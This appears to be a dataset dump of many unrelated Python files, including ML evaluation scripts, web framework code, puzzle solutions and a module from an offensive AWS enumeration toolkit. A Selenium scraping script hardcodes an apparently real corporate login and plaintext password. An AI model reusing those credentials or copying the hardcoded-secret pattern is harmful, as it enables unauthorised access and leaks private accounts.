271c115d6ab1f14265169d98f604d4a63c71184e
|
829029b060010b2928032b3d6728c660b538b5cf
|
refs/heads/main
| 2023-03-27T23:17:53.935109 | 2021-04-09T02:49:58 | 2021-04-09T02:49:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,284 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 2 15:39:34 2020
@author: tanzheng
"""
import pickle
import numpy as np
with open('DNN_3L_SST_predict.pkl', 'rb') as f:
MT_predict_result = pickle.load(f)
f.close()
first_pred_out_y, second_pred_out_y, out_prop_y, tasks = MT_predict_result
No_samples = out_prop_y.shape[0]
np_fir_pred_out_y = np.empty(shape=(No_samples, 0))
np_sec_pred_out_y = np.empty(shape=(No_samples, 0))
for i in range(len(first_pred_out_y)):
np_fir_pred_out_y = np.hstack((np_fir_pred_out_y, first_pred_out_y[i]))
np_sec_pred_out_y = np.hstack((np_sec_pred_out_y, second_pred_out_y[i]))
# target RRMSE
# single target
single_task_RRMSE = []
for i in range(len(tasks)):
temp_ST_RRMSE = sum(np.square(out_prop_y[:,i]-np_fir_pred_out_y[:,i])) / sum(np.square(out_prop_y[:,i]-np.mean(out_prop_y[:,i])))
temp_ST_RRMSE = np.sqrt(temp_ST_RRMSE)
single_task_RRMSE.append(temp_ST_RRMSE)
# multi target
multi_task_RRMSE = []
for i in range(len(tasks)):
temp_MT_RRMSE = sum(np.square(out_prop_y[:,i]-np_sec_pred_out_y[:,i])) / sum(np.square(out_prop_y[:,i]-np.mean(out_prop_y[:,i])))
temp_MT_RRMSE = np.sqrt(temp_MT_RRMSE)
multi_task_RRMSE.append(temp_MT_RRMSE)
|
[
"[email protected]"
] | |
ef5cfcba95a6606c5510682302bc8b7563f002b6
|
e90bf4b372da78ceec15282d060b48d18ba8d4e9
|
/supervisor/backups/const.py
|
c4b5e593e438d1e447c34ebcb2e8cc63ca5d919e
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/supervisor
|
67f2e1755ff5fbf7cf2084351e1c32c6995274e0
|
4838b280adafed0997f32e021274b531178386cd
|
refs/heads/main
| 2023-08-31T22:51:25.949277 | 2023-08-31T08:01:42 | 2023-08-31T08:01:42 | 84,926,758 | 928 | 477 |
Apache-2.0
| 2023-09-14T17:11:27 | 2017-03-14T08:54:15 |
Python
|
UTF-8
|
Python
| false | false | 945 |
py
|
"""Backup consts."""
from enum import StrEnum
BUF_SIZE = 2**20 * 4 # 4MB
class BackupType(StrEnum):
"""Backup type enum."""
FULL = "full"
PARTIAL = "partial"
class BackupJobStage(StrEnum):
"""Backup job stage enum."""
ADDON_REPOSITORIES = "addon_repositories"
ADDONS = "addons"
DOCKER_CONFIG = "docker_config"
FINISHING_FILE = "finishing_file"
FOLDERS = "folders"
HOME_ASSISTANT = "home_assistant"
AWAIT_ADDON_RESTARTS = "await_addon_restarts"
class RestoreJobStage(StrEnum):
"""Restore job stage enum."""
ADDON_REPOSITORIES = "addon_repositories"
ADDONS = "addons"
AWAIT_ADDON_RESTARTS = "await_addon_restarts"
AWAIT_HOME_ASSISTANT_RESTART = "await_home_assistant_restart"
CHECK_HOME_ASSISTANT = "check_home_assistant"
DOCKER_CONFIG = "docker_config"
FOLDERS = "folders"
HOME_ASSISTANT = "home_assistant"
REMOVE_DELTA_ADDONS = "remove_delta_addons"
|
[
"[email protected]"
] | |
c553d74eaa132d25fe4fc5ed0e0a10d05a9ff9e5
|
f2a55f94783fed2a53bc2ff1a0096cfdb75dc5a3
|
/3rd Year Diatomic Simulation Exercise/Particle1D.py
|
9b7e688d4446b103fb241661e708022f216dd910
|
[] |
no_license
|
callous4567/UoE-Projects
|
c7b307878ae1d6b7e00227bb1a681aec2ad55b1f
|
5a4ee803f70f7da9d860f905114a71278c7f50e7
|
refs/heads/master
| 2023-02-18T22:19:25.496429 | 2023-02-13T01:00:19 | 2023-02-13T01:00:19 | 245,646,389 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,034 |
py
|
"""
CMod Ex2: Particle1D, a class to describe 1D particles
"""
class Particle1D(object):
"""
Class to describe 1D particles.
Properties:
position(float) - position along the x axis
velocity(float) - velocity along the x axis
mass(float) - particle mass
Methods:
* formatted output
* kinetic energy
* first-order velocity update
* first- and second order position updates
"""
def __init__(self, pos, vel, mass):
"""
Initialise a Particle1D instance
:param pos: position as float
:param vel: velocity as float
:param mass: mass as float
"""
self.position = pos
self.velocity = vel
self.mass = mass
def __str__(self):
"""
Define output format.
For particle p=(2.0, 0.5, 1.0) this will print as
"x = 2.0, v = 0.5, m = 1.0"
"""
return "x = " + str(self.position) + ", v = " + str(self.velocity) + ", m = " + str(self.mass)
def kinetic_energy(self):
"""
Return kinetic energy as
1/2*mass*vel^2
"""
return 0.5*self.mass*self.velocity**2
# Time integration methods
def leap_velocity(self, dt, force):
"""
First-order velocity update,
v(t+dt) = v(t) + dt*F(t)
:param dt: timestep as float
:param force: force on particle as float
"""
self.velocity += dt*force/self.mass
def leap_pos1st(self, dt):
"""
First-order position update,
x(t+dt) = x(t) + dt*v(t)
:param dt: timestep as float
"""
self.position += dt*self.velocity
def leap_pos2nd(self, dt, force):
"""
Second-order position update,
x(t+dt) = x(t) + dt*v(t) + 1/2*dt^2*F(t)
:param dt: timestep as float
:param force: current force as float
"""
self.position += dt*self.velocity + 0.5*dt**2*force/self.mass
hey = Particle1D()
print(hey.position)
|
[
"[email protected]"
] | |
d2797398c8da6c4fb49aafc3d736a1391d150f12
|
b6f0b3932f8cdee542f3f1fe7f5c27c67e5d1c2d
|
/conf/train_conf_dense_7.py
|
1c88e9db0a9644002cbed124c0e05c35b5d75b9d
|
[] |
no_license
|
fuding/codes_for_sicheng
|
dcab85b66d9f3a0f0c78c5e471223d919a3d14f7
|
c8ba21572921ba0aa9686174305ab48fa614cd5d
|
refs/heads/master
| 2022-02-26T16:32:01.253870 | 2019-10-11T06:10:27 | 2019-10-11T06:10:27 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,453 |
py
|
from easydict import EasyDict
def get_config():
conf = EasyDict()
conf.arch = "dense_7"
conf.model = "MultiHDR"
conf.model_name = conf.arch + ""
conf.use_cpu = False
conf.is_train = True
conf.gpu_ids = [0]
conf.epoch = 400
conf.start_epoch = 0
conf.learning_rate = 0.0002
conf.beta1 = 0.5
conf.loss = 'l2' # l1 or l2
conf.lr_scheme = "MultiStepLR"
conf.lr_steps = [100 * 2387]
conf.lr_gamma = 0.1
conf.dataset_dir = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/"
conf.exp_path = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/exp.json"
conf.dataset_name = 'Multi_LDR_HDR'
conf.batch_size = 8
conf.load_size = 256
conf.fine_size = 256
conf.c_dim = 3
conf.num_shots = 3
conf.n_workers = 4
conf.use_shuffle = True
conf.use_tb_logger = True
conf.experiments_dir = "../../experiments/" + conf.model_name
conf.log_dir = "../../tb_logger/" + conf.model_name
conf.save_freq = 2000
conf.print_freq = 200
# conf.resume_step = 78000
# conf.pretrained = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/models/' + str(
# conf.resume_step) + '_G.pth'
# conf.resume = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/training_state/' + str(
# conf.resume_step) + '.state'
conf.pretrained = None
conf.resume = None
return conf
|
[
"[email protected]"
] | |
c3025edb9e0a4bfafad31ec4def223cfdd8a6809
|
3cc2f47de6d78d610a2887f92bfba150b2994888
|
/application/forms/account.py
|
b709a49955ab50546f45efab620eda042081cd50
|
[] |
no_license
|
fengliu222/blogbar
|
c8a66df586187d0a16063e4536e76d155863fe17
|
ff6e7182f000777112101eed12ae9e2ca4298d25
|
refs/heads/master
| 2021-01-15T08:59:51.478354 | 2014-12-20T08:13:53 | 2014-12-20T08:13:53 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,142 |
py
|
# coding: utf-8
from flask_wtf import Form
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired, Email
from ..models import User
class SigninForm(Form):
"""Form for signin"""
email = StringField('้ฎ็ฎฑ',
validators=[
DataRequired(),
Email()
],
description='Email')
password = PasswordField('ๅฏ็ ',
validators=[DataRequired()],
description='Password')
def validate_email(self, field):
user = User.query.filter(User.email == self.email.data).first()
if not user:
raise ValueError("Account doesn't exist.")
def validate_password(self, field):
if self.email.data:
user = User.query.filter(User.email == self.email.data,
User.password == self.password.data).first()
if not user:
raise ValueError('Password cannot match the Email.')
else:
self.user = user
|
[
"[email protected]"
] | |
8d3c1b8bce69b57d0d51802846a66c1e439b70e4
|
ca4faa1c6d4d87d1702b2c42a64ea6a063d71de9
|
/q2_micom/_transform.py
|
bc96be1fc23acd5496509e2495ad09d70dc7cd8b
|
[
"Apache-2.0"
] |
permissive
|
Gibbons-Lab/q2-micom
|
cb0ed1185a50248eae94a415e03443dbacfa8bfb
|
2d954d4f584675c29aa2eccb5245e4469f1740b6
|
refs/heads/master
| 2020-12-07T08:48:10.020690 | 2020-01-07T23:27:39 | 2020-01-07T23:27:39 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,558 |
py
|
"""Transformers for MICOM types."""
import pandas as pd
from q2_micom.plugin_setup import plugin
import q2_micom._formats_and_types as ft
@plugin.register_transformer
def _1(data: pd.DataFrame) -> ft.MicomMediumFile:
mm = ft.MicomMediumFile()
data.to_csv(str(mm), index=False)
return mm
@plugin.register_transformer
def _2(mm: ft.MicomMediumFile) -> pd.DataFrame:
return pd.read_csv(str(mm), index_col=False)
@plugin.register_transformer
def _3(data: pd.DataFrame) -> ft.ModelManifest:
sbm = ft.SBMLManifest()
data.to_csv(str(sbm), index=False)
return sbm
@plugin.register_transformer
def _4(sbm: ft.ModelManifest) -> pd.DataFrame:
return pd.read_csv(str(sbm), index_col=False)
@plugin.register_transformer
def _5(data: pd.DataFrame) -> ft.CommunityModelManifest:
cmm = ft.CommunityModelManifest()
data.to_csv(str(cmm), index=False)
return cmm
@plugin.register_transformer
def _6(cmm: ft.CommunityModelManifest) -> pd.DataFrame:
return pd.read_csv(str(cmm), index_col=False)
@plugin.register_transformer
def _7(data: pd.DataFrame) -> ft.GrowthRates:
gr = ft.GrowthRates()
data.to_csv(str(gr), index=False)
return gr
@plugin.register_transformer
def _8(gr: ft.GrowthRates) -> pd.DataFrame:
return pd.read_csv(str(gr), index_col=False)
@plugin.register_transformer
def _9(data: pd.DataFrame) -> ft.Fluxes:
ef = ft.Fluxes()
data.to_parquet(str(ef))
return ef
@plugin.register_transformer
def _10(ef: ft.Fluxes) -> pd.DataFrame:
return pd.read_parquet(str(ef))
|
[
"[email protected]"
] | |
3f3fb632bea88ffa2e488c584544669d6e396c19
|
f7328c45c872b69c3b7c2a2bf563257f51e5fbff
|
/src/sound.py
|
02015b9b715fb2938284ce88bb0d22e84a8a2496
|
[
"MIT"
] |
permissive
|
whoji/banjiu_2048
|
ffc45ff9e0b65cccea2b3cc6e91b233db9f7ae79
|
d99522f2f0f6d159b5ecb49d023ee06da5f0f5a5
|
refs/heads/master
| 2020-04-21T04:01:06.870805 | 2019-02-10T09:09:31 | 2019-02-10T09:09:31 | 169,301,201 | 0 | 0 | null | 2019-02-07T03:58:40 | 2019-02-05T19:42:21 |
Python
|
UTF-8
|
Python
| false | false | 2,088 |
py
|
import pygame
from flags import F
class SoundPlayer(object):
"""docstring for SoundPlayer"""
def __init__(self, pygame):
self.pygame = pygame
self.__load_sound()
self.is_playing = False
def __load_sound(self):
self.sounds = {
'move' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_1.wav'),
'merge' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_2.wav'),
'castle' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_3.wav'),
'main_menu' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/sfx_sounds_powerup2.wav'),
'game_over' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
'game_finish' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
}
self.sounds['move'].set_volume(0.3)
self.sounds['main_menu'].set_volume(0.5)
self.sounds['game_over'].set_volume(0.3)
self.sounds['game_finish'].set_volume(0.3)
def play_sound_effect(self, event, game_status):
if game_status == 1: # main menu
if not self.is_playing:
self.sounds['main_menu'].play()
self.is_playing = True
return
elif game_status == 4:
if not self.is_playing:
self.sounds['game_over'].play()
self.is_playing = True
return
elif game_status == 6:
if not self.is_playing:
self.sounds['game_finish'].play()
self.is_playing = True
return
else:
if event[2]: # upgrade
self.sounds['castle'].play()
return
if event[3]: # cancelled_list is not empty
self.sounds['castle'].play()
return
#elif event[1]:
# self.sounds['merge'].play()
#elif event[0]:
# self.sounds['move'].play()
def play_action_sound(self):
self.sounds['move'].play()
|
[
"[email protected]"
] | |
a76b4bd5db57d7d3f6e4f183973cdbe0b2485ff0
|
700c7801958dd4789caf94785b5dc8c5e3daa4fd
|
/ttp/lightsail_enum_keypairs.py
|
b60a67c5e6315a9d9da0f5817af2698ca230cd17
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
blackbotsecurity/AWS-Attack
|
24d4cd6ebda067e9672f4f963d414a7b176e3551
|
ad4668ab60173aabce3c6b9c7685160be5e3f14d
|
refs/heads/master
| 2023-03-14T00:05:54.965341 | 2021-03-05T12:44:27 | 2021-03-05T12:44:27 | 331,603,794 | 14 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,612 |
py
|
#!/usr/bin/env python3
import datetime
#'description': "This module examines Lightsail data fields and automatically enumerates them for all available regions. Available fields can be passed upon execution to only look at certain types of data. By default, all Lightsail fields will be captured.",
import argparse
from botocore.exceptions import ClientError
import importlib
target = ''
technique_info = {
'blackbot_id': 'T1526.b.001',
'external_id': '',
'controller': 'lightsail_enum_keypairs',
'services': ['Lightsail'],
'external_dependencies': [],
'arguments_to_autocomplete': [],
'version': '1',
'aws_namespaces': [],
'last_updated_by': 'Blackbot, Inc. Sun Sep 20 04:13:33 UTC 2020' ,
'ttp_exec': '',
'ttp_mitigation': '',
'ttp_detection': '',
'intent': 'Captures common data associated with Lightsail',
'name': 'Cloud Service Discovery: Lightsail' ,
}
parser = argparse.ArgumentParser(add_help=False, description=technique_info['name'])
def main(args, awsattack_main):
args = parser.parse_args(args)
import_path = 'ttp.src.lightsail_enum_keypairs_src'
src_code = __import__(import_path, globals(), locals(), ['technique_info'], 0)
importlib.reload(src_code)
awsattack_main.chain = True
return src_code.main(args, awsattack_main)
def summary(data, awsattack_main):
out = ' Regions Enumerated:\n'
for region in data['regions']:
out += ' {}\n'.format(region)
del data['regions']
for field in data:
out += ' {} {} enumerated\n'.format(data[field], field[:-1] + '(s)')
return out
|
[
"[email protected]"
] | |
1a7bacfc9808852cf7b990a159af019328d3deb0
|
9c0f691393abbeb5754e1624e0c48dfcdf857352
|
/2017/Helpers/day_06.py
|
b8fc0de773effcccfda5ee364b548908e7b0101b
|
[] |
no_license
|
seligman/aoc
|
d0aac62eda3e6adc3c96229ca859bd2274398187
|
9de27ff2e13100770a3afa4595b15565d45bb6bc
|
refs/heads/master
| 2023-04-02T16:45:19.032567 | 2023-03-22T15:05:33 | 2023-03-22T15:05:33 | 230,493,583 | 17 | 10 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,540 |
py
|
#!/usr/bin/env python3
DAY_NUM = 6
DAY_DESC = 'Day 6: Memory Reallocation'
def calc(log, values, redo):
banks = [int(x) for x in values[0].replace("\t", " ").split(" ")]
seen = set()
while True:
key = tuple(banks)
if key in seen:
if redo == 0:
break
else:
seen = set()
redo -= 1
seen.add(key)
i = banks.index(max(banks))
val = banks[i]
banks[i] = 0
for x in range(val):
banks[(i + 1 + x) % len(banks)] += 1
return len(seen)
def test(log):
values = [
"0 2 7 0",
]
if calc(log, values, 0) == 5:
if calc(log, values, 1) == 4:
return True
else:
return False
else:
return False
def run(log, values):
log(calc(log, values, 0))
log(calc(log, values, 1))
if __name__ == "__main__":
import sys, os
def find_input_file():
for fn in sys.argv[1:] + ["input.txt", f"day_{DAY_NUM:0d}_input.txt", f"day_{DAY_NUM:02d}_input.txt"]:
for dn in [[], ["Puzzles"], ["..", "Puzzles"]]:
cur = os.path.join(*(dn + [fn]))
if os.path.isfile(cur): return cur
fn = find_input_file()
if fn is None: print("Unable to find input file!\nSpecify filename on command line"); exit(1)
print(f"Using '{fn}' as input file:")
with open(fn) as f: values = [x.strip("\r\n") for x in f.readlines()]
print(f"Running day {DAY_DESC}:")
run(print, values)
|
[
"[email protected]"
] | |
7d694881d590f7fe45d3be9f6d9c0c180d407993
|
0049d7959ff872e2ddf6ea3ce83b6c26512425a6
|
/django_demo_applications/djangoprojectsot/modelinheritanceproject/testapp/models.py
|
2ba2ba663d87e53e60132476cad2e672ab93660a
|
[] |
no_license
|
srazor09/Django_projects
|
9806ab25d966af780cdabe652a1792220c7806a8
|
8d664ba4c9478bd93c8e5bcbcaf594e8ffe6ce93
|
refs/heads/master
| 2023-04-18T02:13:15.993393 | 2021-05-04T20:34:05 | 2021-05-04T20:34:05 | 364,379,605 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 695 |
py
|
from django.db import models
# Create your models here.
# class ContactInfo1(models.Model):
# name=models.CharField(max_length=64)
# email=models.EmailField()
# address=models.CharField(max_length=264)
#
# class Student1(ContactInfo1):
# rollno=models.IntegerField()
# marks=models.IntegerField()
#
# class Teacher1(ContactInfo1):
# subject=models.CharField(max_length=264)
# salary=models.FloatField()
class BasicModel(models.Model):
f1=models.CharField(max_length=64)
f2=models.CharField(max_length=64)
f3=models.CharField(max_length=64)
class StandardModel(BasicModel):
f4=models.CharField(max_length=64)
f5=models.CharField(max_length=64)
|
[
"[email protected]"
] | |
2a8d31ce9ce3683a0d4c071feaf1b1488a845422
|
48dab42eeef7f971af1fe98045e669edb8e57ab0
|
/behavioural/observer_pattern.py
|
864f36310cf2de51d7e96f2ba31734a1eb35c03e
|
[
"MIT"
] |
permissive
|
cosmos-sajal/python_design_patterns
|
b7df3e83e74ac5eccd30e8037ebc70987407ca2b
|
d270989f1dfafaef48e4b585eca91603a6c0ac8e
|
refs/heads/master
| 2022-06-06T16:41:41.638518 | 2020-05-05T08:20:16 | 2020-05-05T08:20:16 | 260,250,022 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,112 |
py
|
# Docs - https://deductionlearning.com/design-patterns/observer-pattern-introductory-example/
# https://www.youtube.com/watch?v=wiQdrH2YpT4&list=PLF206E906175C7E07&index=4
# https://www.quora.com/What-are-some-real-world-uses-of-observer-pattern
# difference between PubSub and Observer Pattern -
# https://hackernoon.com/observer-vs-pub-sub-pattern-50d3b27f838c
from abc import ABCMeta, abstractmethod
class Subject(metaclass=ABCMeta):
@abstractmethod
def register(self):
pass
@abstractmethod
def unRegister(self):
pass
@abstractmethod
def notify(self):
pass
class Observer(metaclass=ABCMeta):
@abstractmethod
def update(googlePrice, applePrice, ibmPrice):
pass
class StockObserver(Observer):
observerCounter = 0
def __init__(self, stockGrabber):
StockObserver.observerCounter += 1
self.observerId = StockObserver.observerCounter
stockGrabber.register(self)
def update(self, googlePrice, applePrice, ibmPrice):
print("observer id -" + str(self.observerId))
print("the prices are:" + str(googlePrice) +
" " + str(applePrice) + " " + str(ibmPrice))
class StockGrabber(Subject):
def __init__(self):
self.googlePrice = 0.0
self.applePrice = 0.0
self.ibmPrice = 0.0
self.observers = []
def register(self, o):
self.observers.append(o)
def unRegister(self, o):
self.observers.remove(o)
def notify(self):
for observer in self.observers:
observer.update(self.googlePrice, self.applePrice, self.ibmPrice)
def setGooglePrice(self, price):
self.googlePrice = price
self.notify()
def setApplePrice(self, price):
self.applePrice = price
self.notify()
def setIBMPrice(self, price):
self.ibmPrice = price
self.notify()
stockGrabber = StockGrabber()
observer1 = StockObserver(stockGrabber)
observer2 = StockObserver(stockGrabber)
stockGrabber.setGooglePrice(100.0)
stockGrabber.setApplePrice(200.0)
stockGrabber.setIBMPrice(300.0)
|
[
"[email protected]"
] | |
1e5122dc89c65f5bcead30da6a84115a1b6723ee
|
94f978c65b6368f936e18364cc477591094750f5
|
/quart/__init__.py
|
c7fa2b897ed9969c7681fd2a6aa8a28fd1fd4750
|
[
"MIT"
] |
permissive
|
tharvik/quart
|
2a4ff330dd384dc9f917b179e8d247808e7ccd6c
|
038680bcc1c0966481d73bdbe474f55a3ce104f4
|
refs/heads/master
| 2021-04-18T21:54:18.339532 | 2018-03-06T08:06:33 | 2018-03-06T08:11:48 | 126,790,492 | 0 | 0 | null | 2018-03-26T07:29:58 | 2018-03-26T07:29:58 | null |
UTF-8
|
Python
| false | false | 2,082 |
py
|
from jinja2 import escape, Markup
from .__about__ import __version__
from .app import Quart
from .blueprints import Blueprint
from .config import Config
from .ctx import (
after_this_request, copy_current_request_context, copy_current_websocket_context,
has_app_context, has_request_context, has_websocket_context,
)
from .exceptions import abort
from .globals import (
_app_ctx_stack, _request_ctx_stack, _websocket_ctx_stack, current_app, g, request, session,
websocket,
)
from .helpers import (
flash, get_flashed_messages, get_template_attribute, make_response, stream_with_context,
url_for,
)
from .json import jsonify
from .signals import (
appcontext_popped, appcontext_pushed, appcontext_tearing_down, before_render_template,
got_request_exception, message_flashed, request_finished, request_started,
request_tearing_down, signals_available, template_rendered,
)
from .static import safe_join, send_file, send_from_directory
from .templating import render_template, render_template_string
from .typing import ResponseReturnValue
from .utils import redirect
from .wrappers import Request, Response
__all__ = (
'__version__', '_app_ctx_stack', '_request_ctx_stack', '_websocket_ctx_stack', 'abort',
'after_this_request', 'appcontext_popped', 'appcontext_pushed', 'appcontext_tearing_down',
'before_render_template', 'Blueprint', 'Config', 'copy_current_request_context',
'copy_current_websocket_context', 'current_app', 'escape', 'flash', 'g',
'get_flashed_messages', 'get_template_attribute', 'got_request_exception', 'has_app_context',
'has_request_context', 'has_websocket_context', 'htmlsafe_dumps', 'jsonify', 'make_response',
'Markup', 'message_flashed', 'Quart', 'redirect', 'render_template', 'render_template_string',
'request', 'Request', 'request_finished', 'request_started', 'request_tearing_down',
'Response', 'ResponseReturnValue', 'safe_join', 'send_file', 'send_from_directory', 'session',
'signals_available', 'stream_with_context', 'template_rendered', 'url_for', 'websocket',
)
|
[
"[email protected]"
] | |
9c49f34c4e0af8d51ca97a03a373e5fc2d76440a
|
f0a5ad7b8aa39f51f233391fead0da3eabecc4ee
|
/.history/toolbox/middleware_20191129081531.py
|
bed0186b917d604de34c93cc7df6e8c7ddb4bfb8
|
[] |
no_license
|
OseiasBeu/webScrapping
|
e0a524847e55b24dbbd3d57bbe7fa43b4e101f48
|
1e72c7551aea355a891043baecfcbab8a89e719a
|
refs/heads/master
| 2022-10-25T18:12:50.858653 | 2020-06-18T01:29:24 | 2020-06-18T01:29:24 | 224,681,550 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,601 |
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from datetime import datetime
import toolbox.sheets as sheet
import pandas as pd
def middleware():
driver = webdriver.Chrome(executable_path='chromedriver.exe')
driver.get("https://wsmid-prd.whirlpool.com.br/manager/reports/frmQueryAnalyzer.aspx?menu=2")
dominio = 'whirlpool'
usuario = 'daniel_coelho'
senha = 'Sua95xb4'
bra = "BRA"
data = '2019-11-01'
query = "SELECT pedido.clienteEstado, pedidoItem.warehouseId, count(pedidoItem.warehouseId) as [Pendentes de integraรงรฃo] FROM pedido LEFT JOIN pedidoItem ON pedido.codigoPedido = pedidoItem.codigoPedido WHERE pedido.datahoracriacao > '{}' AND pedido.clientepais = '{}' AND pedido.flagIntegrado = 0 GROUP BY pedidoItem.warehouseId, pedido.clienteEstado ORDER BY [Pendentes de integraรงรฃo] DESC".format(data,bra)
campo_dominio = driver.find_element_by_id("ucLogin1_txtDominio")
campo_dominio.send_keys(dominio)
campo_usuario =driver.find_element_by_id("ucLogin1_txtUser")
campo_usuario.send_keys(usuario)
campo_senha = driver.find_element_by_id("ucLogin1_txtPass")
campo_senha.send_keys(senha)
campo_senha.send_keys(Keys.RETURN)
records = driver.find_element_by_id("ctl00_ContentPlaceHolder1_dropRows")
records.send_keys('sem limites')
text_query = driver.find_element_by_id("ctl00_ContentPlaceHolder1_txtQuery")
text_query.send_keys(query)
executar = driver.find_element_by_id("ctl00_ContentPlaceHolder1_imbExecutar").click()
arr = []
resposta = driver.find_elements_by_tag_name('tr')
for item in range(len(resposta)):
linha = resposta[item].text
arr.append(linha.split())
coluna = arr[3]
coluna1 = coluna.pop(3)
coluna1 = coluna1 +" "+ coluna.pop(3)
coluna1 = coluna1 +" "+ coluna.pop(3)
coluna.append(coluna1)
df = pd.DataFrame(data=arr[4:], columns=coluna)
# df = df.insert(0,'timeStamp')
now = datetime.now()
df['timeStamp'] = ''
df1 = df.drop(columns='#')
wb = pd.ExcelFile('base_middleware.xlsx')
base_m = pd.read_excel(wb)
print(base_m.head())
print(df1.head())
sheet.insertPlanMiddleware(df1)
base_m['timeStamp'] = datetime.now().strftime('%m/%S/%Y %H:%M:%S')
print(df1)
df1.append(base_m)
print(base_m)
nomeArquivo = 'base_middleware.xlsx'
df1.to_excel(nomeArquivo, index=False)
sair = driver.find_element_by_id("ctl00_lgStatus").click()
driver.close()
# clienteEstado warehouseId Pendentes de integraรงรฃo รltima hora?
|
[
"[email protected]"
] | |
43d3606680c7c08b541d8e66a106bbe7f13c0fa7
|
2923b9f58e6a143a3e070169612165585c301def
|
/LA/gp_rupture_test/LA/gp_rupture_test/gp_021219_Scott_7.35_noplas_2hz/fault_full_loc.py
|
d3f385c3d1a7f68a7593b81008a1ecdc93ae3228
|
[] |
no_license
|
hzfmer/summit_work_021421
|
16536dd716519bc9244da60007b9061ef5403429
|
6981b359fefb2af22e0bea6c47511de16cad22bd
|
refs/heads/master
| 2023-03-11T15:34:36.418971 | 2021-02-05T23:22:10 | 2021-02-05T23:22:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,451 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 17 2018
@author: Zhifeng Hu <[email protected]>
"""
import numpy as np
from numpy import sin, cos, pi, sqrt
import os
import sys
import glob
import time
nt_ref = 2000
nt_des = 10 * nt_ref
theta_rot = 35
f = open(glob.glob('./*.srf')[0],'r')
f.readline()
f.readline()
token = f.readline()
nx = int(token.split()[2])
nz = int(token.split()[3])
f.close()
if not os.path.isfile('fault_full_loc.txt'):
fault_loc = np.array(np.loadtxt("fault_loc.idx"))
x1 = int(fault_loc[0,0])
x2 = int(fault_loc[1,0])
y1 = int(fault_loc[0,1])
y2 = int(fault_loc[1,1])
x_tmp = np.linspace(x1, x2, np.abs(x2 - x1) + 1)
y_tmp = [np.float((y2-y1)/(x2-x1))*(x-x1) + y1 for x in x_tmp]
f_interp=interp1d(x_tmp, y_tmp, fill_value='extrapolate')
if x1 < x2:
new_x = np.arange(x1, x1 + nx * 2 )
new_y = [np.int(i) for i in f_interp(new_x)]
else:
new_x = np.arange(x1 + 1 - nx * 2, x1 + 1)
new_y = [np.int(i) for i in f_interp(new_x)]
new_x = new_x[::-1]
new_y = new_y[::-1]
mx = 6320
my = 4200
ll = np.fromfile('../scripts/surf.grid', dtype='float64', count=2 * my * mx).reshape(my, mx, 2)
ll_fault = [np.float32((ll[new_y[i], new_x[i], 0], ll[new_y[i], new_x[i], 1])) for i in range(len(new_x))]
np.savetxt('fault_full_loc.txt', ll, fmt='%f')
# np.array(ll_fault).tofile('latlon_fault.bin')
|
[
"[email protected]"
] | |
c553f3cf8e814068e3de80a5d5d74670c9a32497
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_212/62.py
|
2e921c86f22c4e6edb1a0681c1da5040d943a43a
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 793 |
py
|
import sys
import itertools
sys.setrecursionlimit(10000000)
tc = int(sys.stdin.readline().strip())
for tmp_tc in xrange(tc):
[ N, P ] = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
gs = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
cnts = [ 0 ] * P
for g in gs:
cnts[g % P] += 1
cache = {}
def dp(cfg, p):
if sum(cfg) == 0: return 0
key = tuple(cfg), p
if key in cache: return cache[key]
res = None
for idx, k in enumerate(cfg):
if k == 0: continue
cfg[idx] -= 1
pp = (p + idx) % P
tmp = dp(cfg, pp)
if p: tmp += 1
if res is None or res > tmp: res = tmp
cfg[idx] += 1
cache[key] = res
return res
res = len(gs) - dp(cnts, 0)
print "Case #%d: %d" % (1+tmp_tc, res)
|
[
"[email protected]"
] | |
6d73d131e26cfb65c423acd5a641958d3283c4e9
|
8704a683e1fa8c7c15d114fca47345eef060326b
|
/็ฑป/Pingclass.py
|
37f162cbbd1550ec1a90053f63e4624826cfe8ab
|
[] |
no_license
|
jiaojiner/Python_Basic
|
823be07e8c02585174d933bc3e4ecf528086162c
|
788243f95746e2a00890ebb3262085598ab84800
|
refs/heads/master
| 2020-12-31T22:47:04.561208 | 2020-11-23T13:59:04 | 2020-11-23T13:59:04 | 239,061,150 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 814 |
py
|
